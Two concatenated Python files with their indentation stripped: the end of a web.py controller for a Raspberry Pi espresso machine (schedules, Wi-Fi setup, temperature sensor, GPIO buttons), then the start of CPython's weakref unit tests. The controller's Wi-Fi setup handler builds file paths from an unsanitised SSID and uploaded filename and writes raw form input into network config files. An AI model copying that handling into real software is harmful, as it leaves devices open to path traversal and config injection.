mem.cache_start_time = now.replace(hour=int(mem.cache_start_time.split(":")[0]), minute=int(mem.cache_start_time.split(":")[1]))
mem.cache_end_time = my_schedule['days'][today]['time']['endTime']
mem.cache_end_time = now.replace(hour=int(mem.cache_end_time.split(":")[0]), minute=int(mem.cache_end_time.split(":")[1]))
return "off"
if now < mem.cache_start_time:
return old_mode
if now > mem.cache_start_time and now < mem.cache_end_time:
if mem.sched_flag_on:
return old_mode
else: # start flag NOT set
mem.sched_flag_on = True # set flag
logger.debug("scheduled_mode: going AUTO")
return "auto"
if now > mem.cache_end_time:
if mem.sched_flag_off:
return old_mode
else: # end flag NOT set
mem.sched_flag_off = True # set end flag
logger.debug("scheduled_mode: going OFF")
return "off"
except:
exc_type, exc_value, exc_traceback = sys.exc_info()
logger.error(''.join('!! ' + line for line in traceback.format_exception(exc_type, exc_value, exc_traceback)))
class setup:
def GET(self):
try:
mySsidList = setup.get_ssid_list()
return render.setup(mySsidList)
except:
exc_type, exc_value, exc_traceback = sys.exc_info()
logger.error(''.join('!! ' + line for line in traceback.format_exception(exc_type, exc_value, exc_traceback)))
def POST(self): # catch the inputs, put them into a config file, then call a shell script
try:
input = web.input()
protocol = input.protocol
ssid = input.ssid
passwd = input.passwd
if protocol == "personal":
logger.debug("doing config for WPA personal. ssid = " + ssid)
with open('/var/www/setup/interfaces_default', 'r') as file:
lines = file.readlines()
for idx, line in enumerate(lines):
if line.find("wpa-ssid") > -1:
lines[idx] = ' wpa-ssid "' + ssid + '"\n'
if line.find("wpa-psk") > -1:
lines[idx] = ' wpa-psk "' + passwd + '"\n'
if line.find("pre-up") > -1:
lines[idx] = ' # pre-up wpa_supplicant \n'
if line.find("post-down") > -1:
lines[idx] = ' # post-down # wpa_supplicant \n'
with open('/var/www/setup/ssid/' + ssid + '/interfaces', 'w') as file:
file.writelines(lines)
subprocess.call("/var/www/setup/default.sh 2>&1 >> /var/log/smartconnect.log", shell=True) # , Shell=True
elif protocol == "enterprise":
mycert = web.input(ca_cert={})
filename = ""
filedir = '/etc/certs/' # change this to the directory you want to store the file in.
if 'ca_cert' in mycert: # to check if the file-object is created
filepath = mycert.ca_cert.filename.replace('\\', '/') # replaces the windows-style slashes with linux ones.
filename = filepath.split('/')[-1] # splits the and chooses the last part (the filename with extension)
filename = filedir + filename # put together with my path
fout = open(filename, 'w') # creates the file where the uploaded file should be stored
fout.write(mycert.ca_cert.file.read()) # writes the uploaded file to the newly created file.
fout.close() # closes the file, upload complete.
logger.debug("SETUP: Enterprise - cert file written: " + filename)
with open ('/var/www/setup/interfaces_default', 'r') as file:
lines = file.readlines()
for idx, line in enumerate(lines):
if line.find("wpa-ssid") > -1:
lines[idx] = ' wpa-ssid "' + ssid + '"\n'
if line.find("wpa-psk") > -1:
lines[idx] = '# wpa-psk \n' # commenting out the PSK line for Enterprise, we're going to do wpa-supplicant instead
if line.find("pre-up") > -1:
lines[idx] = ' pre-up wpa_supplicant -B -Dwext -i wlan0 -c/etc/wpa_supplicant/wpa_supplicant.conf -f /var/log/wpa_supplicant.log \n'
if line.find("post-down") > -1:
lines[idx] = ' post-down killall -q wpa_supplicant \n'
with open('/var/www/setup/ssid/' + ssid + '/interfaces', 'w') as file:
file.writelines(lines)
with open ('/var/www/setup/wpa_supplicant.conf', 'r') as file:
lines = file.readlines()
for idx, line in enumerate(lines):
if line.find(" ssid") > -1: # need the trailing space so it doesnt squash scan_ssid field
lines[idx] = ' ssid="' + ssid + '"\n'
if line.find("key_mgmt") > -1:
lines[idx] = ' key_mgmt=' + input.key_mgmt + '\n'
if line.find("pairwise") > -1:
lines[idx] = ' pairwise=' + input.pairwise + '\n'
if line.find("group") > -1:
lines[idx] = ' group=' + input.group + '\n'
if line.find("psk") > -1:
lines[idx] = ' psk="' + input.psk + '"\n'
if line.find("eap") > -1:
lines[idx] = ' eap=' + input.eap + '\n'
if line.find("identity") > -1:
lines[idx] = ' identity="' + input.identity + '"\n'
if line.find("password") > -1:
lines[idx] = ' password="' + passwd + '"\n'
if line.find("ca_cert=") > -1 : # need the trailing = so it doesn't squash ca_cert2 field
lines[idx] = ' ca_cert="' + filename + '"\n'
with open('/var/www/setup/ssid/' + ssid + '/wpa_supplicant.conf', 'w') as file:
file.writelines(lines)
subprocess.call("/var/www/setup/default.sh 2>&1 >> /var/log/smartconnect.log", shell=True) # , Shell=True
except:
exc_type, exc_value, exc_traceback = sys.exc_info()
logger.error(''.join('!! ' + line for line in traceback.format_exception(exc_type, exc_value, exc_traceback)))
@staticmethod
def get_ssid_list():
try:
iwlist_cmd = "iwlist wlan0 scanning | grep ESSID"
proc = subprocess.Popen(iwlist_cmd, shell=True, stdout=subprocess.PIPE)
myNwList = []
while True:
line = proc.stdout.readline()
if line != '':
line = line[line.find('"') + 1 : len(line) - 2]
myNwList.append(line)
else:
break
return myNwList
except:
exc_type, exc_value, exc_traceback = sys.exc_info()
logger.error(''.join('!! ' + line for line in traceback.format_exception(exc_type, exc_value, exc_traceback)))
    @staticmethod
    def get_immediate_subdirectories(a_dir):
return [name for name in os.listdir(a_dir)
if os.path.isdir(os.path.join(a_dir, name))]
@staticmethod
def check_connected(): # assumes we have a wifi configuration in place in /etc/network/interfaces and we want to test it
try:
url = "http://google.com"
response = requests.get(url)
return True
except:
pass
return False
@staticmethod
def wifi_connect():
try:
if setup.check_connected():
return True
my_ssid_list = setup.get_ssid_list()
my_subdir_list = setup.get_immediate_subdirectories("/var/www/setup/ssid/")
for ssid in my_ssid_list: # need to compare lists, and try out each one that matches
if ssid in my_subdir_list: # attempt connection - move file(s) into place, and recycle ifdown & ifup
logger.debug("wifi_connect: trying ssid = " + ssid)
shutil.copy2("/var/www/setup/ssid/" + ssid + "/interfaces", "/etc/network/interfaces")
if os.path.isfile("/var/www/setup/ssid/" + ssid + "/wpa_supplicant.conf"):
shutil.copy2("/var/www/setup/ssid/" + ssid + "/wpa_supplicant.conf", "/etc/wpa_supplicant/wpa_supplicant.conf")
my_cmd = "sudo ifdown wlan0 && sudo ifup wlan0"
proc = subprocess.Popen(my_cmd, shell=True, stdout=subprocess.PIPE)
                    if setup.check_connected():
return True
return False
except:
exc_type, exc_value, exc_traceback = sys.exc_info()
logger.error(''.join('!! ' + line for line in traceback.format_exception(exc_type, exc_value, exc_traceback)))
@staticmethod
def smart_connect():
logger.debug("Calling SmartConnect setup.sh")
subprocess.call("/var/www/setup/smartconnect.sh 2>&1 >> /var/log/smartconnect.log", shell=True)
class schedule:
def GET(self):
with open("schedule.json") as f:
filecontents = json.load(f)
return render.schedule(json.dumps(filecontents), str(datetime.now())) # a JSON object (string) at this point
def POST(self):
data = web.data() # web.input gives back a Storage < > thing
mydata = json.loads(data)
with open("schedule.json") as f:
my_schedule = json.load(f)
week = {'Sunday':0, 'Monday':1, 'Tuesday':2, 'Wednesday':3, 'Thursday':4, 'Friday':5, 'Saturday':6}
my_schedule['days'][week[mydata['day']]]['time']['startTime'] = mydata['time']['startTime']
my_schedule['days'][week[mydata['day']]]['time']['endTime'] = mydata['time']['endTime']
tellHeatProc(None, True) # FLUSH the cache so that the other process picks up the changes
with open("schedule.json", "wb") as output_file:
json.dump(my_schedule, output_file)
return json.dumps("OK")
def tempdata():
try:
one_wire = mem.one_wire # gets set below, on init "/sys/bus/w1/devices/28-000004e0badb/w1_slave"
pipe = Popen(["cat", one_wire], stdout=PIPE)
result = pipe.communicate()[0]
result_list = result.split("=")
try:
            temp_C = float(result_list[-1]) / 1000  # temp in Celsius
except ValueError: # probably means we can't read the 1-wire sensor
# logger.warn('Could not get a value from 1-wire connector. Using ' + one_wire )
temp_C = 0
return temp_C
except:
exc_type, exc_value, exc_traceback = sys.exc_info()
logger.error(''.join('!! ' + line for line in traceback.format_exception(exc_type, exc_value, exc_traceback)))
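# The w1_therm sysfs file read above ends with a field of the form "t=93062",
# i.e. the temperature in thousandths of a degree Celsius (93.062 C here),
# which is why the last '='-separated field is divided by 1000.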
def catchButton(btn): # GPIO
try:
time.sleep(0.05)
if GPIO.input(btn) != GPIO.HIGH: # check to see if the input button is still high, protect against EMI false positive
return
        if GPIO.input(gpio_btn_heat_sig) == GPIO.HIGH and GPIO.input(gpio_btn_pump_sig) == GPIO.HIGH:  # both buttons pressed
mem.lcd_connection.send(["Live long", "and prosper!", 1]) # easter egg
mem.lcd_connection.send(["iSPRESSO", "", 0]) # easter egg
logger.info("You found an easter egg!")
return
if btn == gpio_btn_heat_sig:
now = time.time()
if now - mem.time_heat_button_pressed < 1:
mem.time_heat_button_pressed = now
return
mem.time_heat_button_pressed = now
if param.mode == "off":
GPIO.output(gpio_btn_heat_led, GPIO.HIGH) # this is a bit of a hack because the temp control also regulates the LED but putting it here gives better user experience.
logger.debug("catchButton: telling Heat Proc AUTO (ON) ")
tellHeatProc("auto")
else:
GPIO.output(gpio_btn_heat_led, GPIO.LOW)
logger.debug("catchButton: telling Heat Proc OFF")
tellHeatProc("off")
elif btn == gpio_btn_pump_sig:
logger.debug("catchButton: telling Brew Proc (toggle)")
time_stamp = time.time()
brew_plan = [['Presoak', mem.presoak_time], ['Wait', mem.wait_time], ['Brew', mem.brew_time]]
mem.brew_connection.send([time_stamp, brew_plan])
except:
exc_type, exc_value, exc_traceback = sys.exc_info()
logger.error(''.join('!! ' + line for line in traceback.format_exception(exc_type, exc_value, exc_traceback)))
class logdisplay:
def GET(self):
        fp = open('/var/log/ispresso.log', 'rU')  # read the whole log file
        text = fp.read()
        fp.close()
        return render.logdisplay(text)  # rendered with templates/logdisplay.html
def cleanUp():
logger.info("Shutting down...")
mem.lcd_connection.send(["iSPRESSO", "Shutting down", 0])
execfile ('shutdown.py')
if __name__ == '__main__':
try:
logger_init()
os.chdir("/var/www")
call(["modprobe", "w1-gpio"])
call(["modprobe", "w1-therm"])
base_dir = '/sys/bus/w1/devices/'
try:
base_dir = glob.glob(base_dir + '3b*')[0]
except:
logger.error("EPIC FAIL! 1-Wire Temp sensor not found in " + base_dir)
mem.one_wire = base_dir + '/w1_slave'
urls = ("/", "ispresso", "/settings", "settings", "/schedule", "schedule", "/advanced", "advanced", "/getstatus", "getstatus", "/logdisplay", "logdisplay", "/setup", "setup", "/echo", "echo")
render = web.template.render("/var/www/templates/")
app = web.application(urls, globals())
atexit.register(cleanUp)
statusQ = Queue(2)
parent_conn, child_conn = Pipe()
#lcd_parent_conn, lcd_child_conn = Pipe()
#mem.lcd_connection = lcd_parent_conn
initialize()
cloud_parent_conn, cloud_child_conn = Pipe()
mem.cloud_connection = cloud_parent_conn
brew_parent_conn, brew_child_conn = Pipe()
mem.brew_connection = brew_parent_conn
global_vars = globalvars()
GPIO.add_event_detect(gpio_btn_heat_sig, GPIO.RISING, callback=catchButton, bouncetime=250)
GPIO.add_event_detect(gpio_btn_pump_sig, GPIO.RISING, callback=catchButton, bouncetime=250) # was RISING, at one point HIGH. who knows
        mem.heat_connection = parent_conn
#lcdproc = Process(name="lcdControlProc", target=lcdControlProc, args=(lcd_child_conn,))
#lcdproc.start()
brewproc = Process(name="brewControlProc", target=brewControlProc, args=(brew_child_conn,))
brewproc.start()
cloudproc = Process(name="cloudControlProc", target=cloudControlProc, args=(global_vars, brew_parent_conn,))
cloudproc.start()
p = Process(name="tempControlProc", target=tempControlProc, args=(global_vars, param.mode, param.cycle_time, param.duty_cycle, \
param.set_point, param.k_param, param.i_param, param.d_param, statusQ, child_conn))
p.start()
app.add_processor(add_global_hook(parent_conn, statusQ))
app.run()
except KeyboardInterrupt:
cleanUp()
sys.exit()
except:
exc_type, exc_value, exc_traceback = sys.exc_info()
logger.error(''.join('!! ' + line for line in traceback.format_exception(exc_type, exc_value, exc_traceback)))
cleanUp()
sys.exit()
if mem.scheduler_enabled: # if program is just been started, set the mode according to the schedule, assuming schedule is ON
tellHeatProc("auto")
|
test_weakref.py
|
import gc
import sys
import unittest
import collections
import weakref
import operator
import contextlib
import copy
import threading
import time
import random
from test import support
from test.support import script_helper, ALWAYS_EQ
# Used in ReferencesTestCase.test_ref_created_during_del() .
ref_from_del = None
# Used by FinalizeTestCase as a global that may be replaced by None
# when the interpreter shuts down.
_global_var = 'foobar'
class C:
def method(self):
pass
class Callable:
bar = None
def __call__(self, x):
self.bar = x
def create_function():
def f(): pass
return f
def create_bound_method():
return C().method
class Object:
def __init__(self, arg):
self.arg = arg
def __repr__(self):
return "<Object %r>" % self.arg
def __eq__(self, other):
if isinstance(other, Object):
return self.arg == other.arg
return NotImplemented
def __lt__(self, other):
if isinstance(other, Object):
return self.arg < other.arg
return NotImplemented
def __hash__(self):
return hash(self.arg)
def some_method(self):
return 4
def other_method(self):
return 5
class RefCycle:
def __init__(self):
self.cycle = self
class TestBase(unittest.TestCase):
def setUp(self):
self.cbcalled = 0
def callback(self, ref):
self.cbcalled += 1
@contextlib.contextmanager
def collect_in_thread(period=0.0001):
"""
Ensure GC collections happen in a different thread, at a high frequency.
"""
please_stop = False
def collect():
while not please_stop:
time.sleep(period)
gc.collect()
with support.disable_gc():
t = threading.Thread(target=collect)
t.start()
try:
yield
finally:
please_stop = True
t.join()
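# Usage sketch: threaded weak-mapping tests later in the file wrap their bodies
# in "with collect_in_thread():" so that gc.collect() keeps firing from a
# background thread while the main thread mutates a weak container.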
class ReferencesTestCase(TestBase):
def test_basic_ref(self):
self.check_basic_ref(C)
self.check_basic_ref(create_function)
self.check_basic_ref(create_bound_method)
# Just make sure the tp_repr handler doesn't raise an exception.
# Live reference:
o = C()
wr = weakref.ref(o)
repr(wr)
# Dead reference:
del o
repr(wr)
def test_basic_callback(self):
self.check_basic_callback(C)
self.check_basic_callback(create_function)
self.check_basic_callback(create_bound_method)
@support.cpython_only
def test_cfunction(self):
import _testcapi
create_cfunction = _testcapi.create_cfunction
f = create_cfunction()
wr = weakref.ref(f)
self.assertIs(wr(), f)
del f
self.assertIsNone(wr())
self.check_basic_ref(create_cfunction)
self.check_basic_callback(create_cfunction)
def test_multiple_callbacks(self):
o = C()
ref1 = weakref.ref(o, self.callback)
ref2 = weakref.ref(o, self.callback)
del o
self.assertIsNone(ref1(), "expected reference to be invalidated")
self.assertIsNone(ref2(), "expected reference to be invalidated")
self.assertEqual(self.cbcalled, 2,
"callback not called the right number of times")
def test_multiple_selfref_callbacks(self):
# Make sure all references are invalidated before callbacks are called
#
# What's important here is that we're using the first
# reference in the callback invoked on the second reference
# (the most recently created ref is cleaned up first). This
# tests that all references to the object are invalidated
# before any of the callbacks are invoked, so that we only
# have one invocation of _weakref.c:cleanup_helper() active
# for a particular object at a time.
#
def callback(object, self=self):
self.ref()
c = C()
self.ref = weakref.ref(c, callback)
ref1 = weakref.ref(c, callback)
del c
def test_constructor_kwargs(self):
c = C()
self.assertRaises(TypeError, weakref.ref, c, callback=None)
def test_proxy_ref(self):
o = C()
o.bar = 1
ref1 = weakref.proxy(o, self.callback)
ref2 = weakref.proxy(o, self.callback)
del o
def check(proxy):
proxy.bar
self.assertRaises(ReferenceError, check, ref1)
self.assertRaises(ReferenceError, check, ref2)
self.assertRaises(ReferenceError, bool, weakref.proxy(C()))
self.assertEqual(self.cbcalled, 2)
def check_basic_ref(self, factory):
o = factory()
ref = weakref.ref(o)
self.assertIsNotNone(ref(),
"weak reference to live object should be live")
o2 = ref()
self.assertIs(o, o2,
"<ref>() should return original object if live")
def check_basic_callback(self, factory):
self.cbcalled = 0
o = factory()
ref = weakref.ref(o, self.callback)
del o
self.assertEqual(self.cbcalled, 1,
"callback did not properly set 'cbcalled'")
self.assertIsNone(ref(),
"ref2 should be dead after deleting object reference")
def test_ref_reuse(self):
o = C()
ref1 = weakref.ref(o)
# create a proxy to make sure that there's an intervening creation
# between these two; it should make no difference
proxy = weakref.proxy(o)
ref2 = weakref.ref(o)
self.assertIs(ref1, ref2,
"reference object w/out callback should be re-used")
o = C()
proxy = weakref.proxy(o)
ref1 = weakref.ref(o)
ref2 = weakref.ref(o)
self.assertIs(ref1, ref2,
"reference object w/out callback should be re-used")
self.assertEqual(weakref.getweakrefcount(o), 2,
"wrong weak ref count for object")
del proxy
self.assertEqual(weakref.getweakrefcount(o), 1,
"wrong weak ref count for object after deleting proxy")
def test_proxy_reuse(self):
o = C()
proxy1 = weakref.proxy(o)
ref = weakref.ref(o)
proxy2 = weakref.proxy(o)
self.assertIs(proxy1, proxy2,
"proxy object w/out callback should have been re-used")
def test_basic_proxy(self):
o = C()
self.check_proxy(o, weakref.proxy(o))
L = collections.UserList()
p = weakref.proxy(L)
self.assertFalse(p, "proxy for empty UserList should be false")
p.append(12)
self.assertEqual(len(L), 1)
self.assertTrue(p, "proxy for non-empty UserList should be true")
p[:] = [2, 3]
self.assertEqual(len(L), 2)
self.assertEqual(len(p), 2)
self.assertIn(3, p, "proxy didn't support __contains__() properly")
p[1] = 5
self.assertEqual(L[1], 5)
self.assertEqual(p[1], 5)
L2 = collections.UserList(L)
p2 = weakref.proxy(L2)
self.assertEqual(p, p2)
## self.assertEqual(repr(L2), repr(p2))
L3 = collections.UserList(range(10))
p3 = weakref.proxy(L3)
self.assertEqual(L3[:], p3[:])
self.assertEqual(L3[5:], p3[5:])
self.assertEqual(L3[:5], p3[:5])
self.assertEqual(L3[2:5], p3[2:5])
def test_proxy_unicode(self):
# See bug 5037
class C(object):
def __str__(self):
return "string"
def __bytes__(self):
return b"bytes"
instance = C()
self.assertIn("__bytes__", dir(weakref.proxy(instance)))
self.assertEqual(bytes(weakref.proxy(instance)), b"bytes")
def test_proxy_index(self):
class C:
def __index__(self):
return 10
o = C()
p = weakref.proxy(o)
self.assertEqual(operator.index(p), 10)
def test_proxy_div(self):
class C:
def __floordiv__(self, other):
return 42
def __ifloordiv__(self, other):
return 21
o = C()
p = weakref.proxy(o)
self.assertEqual(p // 5, 42)
p //= 5
self.assertEqual(p, 21)
def test_proxy_matmul(self):
class C:
def __matmul__(self, other):
return 1729
def __rmatmul__(self, other):
return -163
def __imatmul__(self, other):
return 561
o = C()
p = weakref.proxy(o)
self.assertEqual(p @ 5, 1729)
self.assertEqual(5 @ p, -163)
p @= 5
self.assertEqual(p, 561)
# The PyWeakref_* C API is documented as allowing either NULL or
# None as the value for the callback, where either means "no
# callback". The "no callback" ref and proxy objects are supposed
# to be shared so long as they exist by all callers so long as
# they are active. In Python 2.3.3 and earlier, this guarantee
# was not honored, and was broken in different ways for
# PyWeakref_NewRef() and PyWeakref_NewProxy(). (Two tests.)
def test_shared_ref_without_callback(self):
self.check_shared_without_callback(weakref.ref)
def test_shared_proxy_without_callback(self):
self.check_shared_without_callback(weakref.proxy)
def check_shared_without_callback(self, makeref):
o = Object(1)
p1 = makeref(o, None)
p2 = makeref(o, None)
self.assertIs(p1, p2, "both callbacks were None in the C API")
del p1, p2
p1 = makeref(o)
p2 = makeref(o, None)
self.assertIs(p1, p2, "callbacks were NULL, None in the C API")
del p1, p2
p1 = makeref(o)
p2 = makeref(o)
self.assertIs(p1, p2, "both callbacks were NULL in the C API")
del p1, p2
p1 = makeref(o, None)
p2 = makeref(o)
self.assertIs(p1, p2, "callbacks were None, NULL in the C API")
def test_callable_proxy(self):
o = Callable()
ref1 = weakref.proxy(o)
self.check_proxy(o, ref1)
self.assertIs(type(ref1), weakref.CallableProxyType,
"proxy is not of callable type")
ref1('twinkies!')
self.assertEqual(o.bar, 'twinkies!',
"call through proxy not passed through to original")
ref1(x='Splat.')
self.assertEqual(o.bar, 'Splat.',
"call through proxy not passed through to original")
# expect due to too few args
self.assertRaises(TypeError, ref1)
# expect due to too many args
self.assertRaises(TypeError, ref1, 1, 2, 3)
def check_proxy(self, o, proxy):
o.foo = 1
self.assertEqual(proxy.foo, 1,
"proxy does not reflect attribute addition")
o.foo = 2
self.assertEqual(proxy.foo, 2,
"proxy does not reflect attribute modification")
del o.foo
self.assertFalse(hasattr(proxy, 'foo'),
"proxy does not reflect attribute removal")
proxy.foo = 1
self.assertEqual(o.foo, 1,
"object does not reflect attribute addition via proxy")
proxy.foo = 2
self.assertEqual(o.foo, 2,
"object does not reflect attribute modification via proxy")
del proxy.foo
self.assertFalse(hasattr(o, 'foo'),
"object does not reflect attribute removal via proxy")
def test_proxy_deletion(self):
# Test clearing of SF bug #762891
class Foo:
result = None
def __delitem__(self, accessor):
self.result = accessor
g = Foo()
f = weakref.proxy(g)
del f[0]
self.assertEqual(f.result, 0)
def test_proxy_bool(self):
# Test clearing of SF bug #1170766
class List(list): pass
lyst = List()
self.assertEqual(bool(weakref.proxy(lyst)), bool(lyst))
def test_proxy_iter(self):
# Test fails with a debug build of the interpreter
# (see bpo-38395).
obj = None
class MyObj:
def __iter__(self):
nonlocal obj
del obj
return NotImplemented
obj = MyObj()
p = weakref.proxy(obj)
with self.assertRaises(TypeError):
# "blech" in p calls MyObj.__iter__ through the proxy,
# without keeping a reference to the real object, so it
# can be killed in the middle of the call
"blech" in p
def test_getweakrefcount(self):
o = C()
ref1 = weakref.ref(o)
ref2 = weakref.ref(o, self.callback)
self.assertEqual(weakref.getweakrefcount(o), 2,
"got wrong number of weak reference objects")
proxy1 = weakref.proxy(o)
proxy2 = weakref.proxy(o, self.callback)
self.assertEqual(weakref.getweakrefcount(o), 4,
"got wrong number of weak reference objects")
del ref1, ref2, proxy1, proxy2
self.assertEqual(weakref.getweakrefcount(o), 0,
"weak reference objects not unlinked from"
" referent when discarded.")
# assumes ints do not support weakrefs
self.assertEqual(weakref.getweakrefcount(1), 0,
"got wrong number of weak reference objects for int")
def test_getweakrefs(self):
o = C()
ref1 = weakref.ref(o, self.callback)
ref2 = weakref.ref(o, self.callback)
del ref1
self.assertEqual(weakref.getweakrefs(o), [ref2],
"list of refs does not match")
o = C()
ref1 = weakref.ref(o, self.callback)
ref2 = weakref.ref(o, self.callback)
del ref2
self.assertEqual(weakref.getweakrefs(o), [ref1],
"list of refs does not match")
del ref1
self.assertEqual(weakref.getweakrefs(o), [],
"list of refs not cleared")
# assumes ints do not support weakrefs
self.assertEqual(weakref.getweakrefs(1), [],
"list of refs does not match for int")
def test_newstyle_number_ops(self):
class F(float):
pass
f = F(2.0)
p = weakref.proxy(f)
self.assertEqual(p + 1.0, 3.0)
self.assertEqual(1.0 + p, 3.0) # this used to SEGV
def test_callbacks_protected(self):
# Callbacks protected from already-set exceptions?
# Regression test for SF bug #478534.
class BogusError(Exception):
pass
data = {}
def remove(k):
del data[k]
def encapsulate():
f = lambda : ()
data[weakref.ref(f, remove)] = None
raise BogusError
try:
encapsulate()
except BogusError:
pass
else:
self.fail("exception not properly restored")
try:
encapsulate()
except BogusError:
pass
else:
self.fail("exception not properly restored")
def test_sf_bug_840829(self):
# "weakref callbacks and gc corrupt memory"
# subtype_dealloc erroneously exposed a new-style instance
# already in the process of getting deallocated to gc,
# causing double-deallocation if the instance had a weakref
# callback that triggered gc.
# If the bug exists, there probably won't be an obvious symptom
# in a release build. In a debug build, a segfault will occur
# when the second attempt to remove the instance from the "list
# of all objects" occurs.
import gc
class C(object):
pass
c = C()
wr = weakref.ref(c, lambda ignore: gc.collect())
del c
# There endeth the first part. It gets worse.
del wr
c1 = C()
c1.i = C()
wr = weakref.ref(c1.i, lambda ignore: gc.collect())
c2 = C()
c2.c1 = c1
del c1 # still alive because c2 points to it
# Now when subtype_dealloc gets called on c2, it's not enough just
# that c2 is immune from gc while the weakref callbacks associated
# with c2 execute (there are none in this 2nd half of the test, btw).
# subtype_dealloc goes on to call the base classes' deallocs too,
# so any gc triggered by weakref callbacks associated with anything
# torn down by a base class dealloc can also trigger double
# deallocation of c2.
del c2
def test_callback_in_cycle_1(self):
import gc
class J(object):
pass
class II(object):
def acallback(self, ignore):
self.J
I = II()
I.J = J
I.wr = weakref.ref(J, I.acallback)
# Now J and II are each in a self-cycle (as all new-style class
# objects are, since their __mro__ points back to them). I holds
# both a weak reference (I.wr) and a strong reference (I.J) to class
# J. I is also in a cycle (I.wr points to a weakref that references
# I.acallback). When we del these three, they all become trash, but
# the cycles prevent any of them from getting cleaned up immediately.
# Instead they have to wait for cyclic gc to deduce that they're
# trash.
#
# gc used to call tp_clear on all of them, and the order in which
# it does that is pretty accidental. The exact order in which we
# built up these things manages to provoke gc into running tp_clear
# in just the right order (I last). Calling tp_clear on II leaves
# behind an insane class object (its __mro__ becomes NULL). Calling
# tp_clear on J breaks its self-cycle, but J doesn't get deleted
# just then because of the strong reference from I.J. Calling
# tp_clear on I starts to clear I's __dict__, and just happens to
# clear I.J first -- I.wr is still intact. That removes the last
# reference to J, which triggers the weakref callback. The callback
# tries to do "self.J", and instances of new-style classes look up
# attributes ("J") in the class dict first. The class (II) wants to
# search II.__mro__, but that's NULL. The result was a segfault in
# a release build, and an assert failure in a debug build.
del I, J, II
gc.collect()
def test_callback_in_cycle_2(self):
import gc
# This is just like test_callback_in_cycle_1, except that II is an
# old-style class. The symptom is different then: an instance of an
# old-style class looks in its own __dict__ first. 'J' happens to
# get cleared from I.__dict__ before 'wr', and 'J' was never in II's
# __dict__, so the attribute isn't found. The difference is that
# the old-style II doesn't have a NULL __mro__ (it doesn't have any
# __mro__), so no segfault occurs. Instead it got:
# test_callback_in_cycle_2 (__main__.ReferencesTestCase) ...
# Exception exceptions.AttributeError:
# "II instance has no attribute 'J'" in <bound method II.acallback
# of <?.II instance at 0x00B9B4B8>> ignored
class J(object):
pass
class II:
def acallback(self, ignore):
self.J
I = II()
I.J = J
I.wr = weakref.ref(J, I.acallback)
del I, J, II
gc.collect()
def test_callback_in_cycle_3(self):
import gc
# This one broke the first patch that fixed the last two. In this
# case, the objects reachable from the callback aren't also reachable
# from the object (c1) *triggering* the callback: you can get to
# c1 from c2, but not vice-versa. The result was that c2's __dict__
# got tp_clear'ed by the time the c2.cb callback got invoked.
class C:
def cb(self, ignore):
self.me
self.c1
self.wr
c1, c2 = C(), C()
c2.me = c2
c2.c1 = c1
c2.wr = weakref.ref(c1, c2.cb)
del c1, c2
gc.collect()
def test_callback_in_cycle_4(self):
import gc
# Like test_callback_in_cycle_3, except c2 and c1 have different
# classes. c2's class (C) isn't reachable from c1 then, so protecting
# objects reachable from the dying object (c1) isn't enough to stop
# c2's class (C) from getting tp_clear'ed before c2.cb is invoked.
# The result was a segfault (C.__mro__ was NULL when the callback
# tried to look up self.me).
class C(object):
def cb(self, ignore):
self.me
self.c1
self.wr
class D:
pass
c1, c2 = D(), C()
c2.me = c2
c2.c1 = c1
c2.wr = weakref.ref(c1, c2.cb)
del c1, c2, C, D
gc.collect()
@support.requires_type_collecting
def test_callback_in_cycle_resurrection(self):
import gc
# Do something nasty in a weakref callback: resurrect objects
# from dead cycles. For this to be attempted, the weakref and
# its callback must also be part of the cyclic trash (else the
# objects reachable via the callback couldn't be in cyclic trash
# to begin with -- the callback would act like an external root).
# But gc clears trash weakrefs with callbacks early now, which
# disables the callbacks, so the callbacks shouldn't get called
# at all (and so nothing actually gets resurrected).
alist = []
class C(object):
def __init__(self, value):
self.attribute = value
def acallback(self, ignore):
alist.append(self.c)
c1, c2 = C(1), C(2)
c1.c = c2
c2.c = c1
c1.wr = weakref.ref(c2, c1.acallback)
c2.wr = weakref.ref(c1, c2.acallback)
def C_went_away(ignore):
alist.append("C went away")
wr = weakref.ref(C, C_went_away)
del c1, c2, C # make them all trash
self.assertEqual(alist, []) # del isn't enough to reclaim anything
gc.collect()
# c1.wr and c2.wr were part of the cyclic trash, so should have
# been cleared without their callbacks executing. OTOH, the weakref
# to C is bound to a function local (wr), and wasn't trash, so that
# callback should have been invoked when C went away.
self.assertEqual(alist, ["C went away"])
# The remaining weakref should be dead now (its callback ran).
self.assertEqual(wr(), None)
del alist[:]
gc.collect()
self.assertEqual(alist, [])
def test_callbacks_on_callback(self):
import gc
# Set up weakref callbacks *on* weakref callbacks.
alist = []
def safe_callback(ignore):
alist.append("safe_callback called")
class C(object):
def cb(self, ignore):
alist.append("cb called")
c, d = C(), C()
c.other = d
d.other = c
callback = c.cb
c.wr = weakref.ref(d, callback) # this won't trigger
d.wr = weakref.ref(callback, d.cb) # ditto
external_wr = weakref.ref(callback, safe_callback) # but this will
self.assertIs(external_wr(), callback)
# The weakrefs attached to c and d should get cleared, so that
# C.cb is never called. But external_wr isn't part of the cyclic
# trash, and no cyclic trash is reachable from it, so safe_callback
# should get invoked when the bound method object callback (c.cb)
# -- which is itself a callback, and also part of the cyclic trash --
# gets reclaimed at the end of gc.
del callback, c, d, C
self.assertEqual(alist, []) # del isn't enough to clean up cycles
gc.collect()
self.assertEqual(alist, ["safe_callback called"])
self.assertEqual(external_wr(), None)
del alist[:]
gc.collect()
self.assertEqual(alist, [])
def test_gc_during_ref_creation(self):
self.check_gc_during_creation(weakref.ref)
def test_gc_during_proxy_creation(self):
self.check_gc_during_creation(weakref.proxy)
def check_gc_during_creation(self, makeref):
thresholds = gc.get_threshold()
gc.set_threshold(1, 1, 1)
gc.collect()
class A:
pass
def callback(*args):
pass
referenced = A()
a = A()
a.a = a
a.wr = makeref(referenced)
try:
# now make sure the object and the ref get labeled as
# cyclic trash:
a = A()
weakref.ref(referenced, callback)
finally:
gc.set_threshold(*thresholds)
def test_ref_created_during_del(self):
# Bug #1377858
# A weakref created in an object's __del__() would crash the
# interpreter when the weakref was cleaned up since it would refer to
# non-existent memory. This test should not segfault the interpreter.
class Target(object):
def __del__(self):
global ref_from_del
ref_from_del = weakref.ref(self)
w = Target()
def test_init(self):
# Issue 3634
# <weakref to class>.__init__() doesn't check errors correctly
r = weakref.ref(Exception)
self.assertRaises(TypeError, r.__init__, 0, 0, 0, 0, 0)
# No exception should be raised here
gc.collect()
def test_classes(self):
# Check that classes are weakrefable.
class A(object):
pass
l = []
weakref.ref(int)
a = weakref.ref(A, l.append)
A = None
gc.collect()
self.assertEqual(a(), None)
self.assertEqual(l, [a])
def test_equality(self):
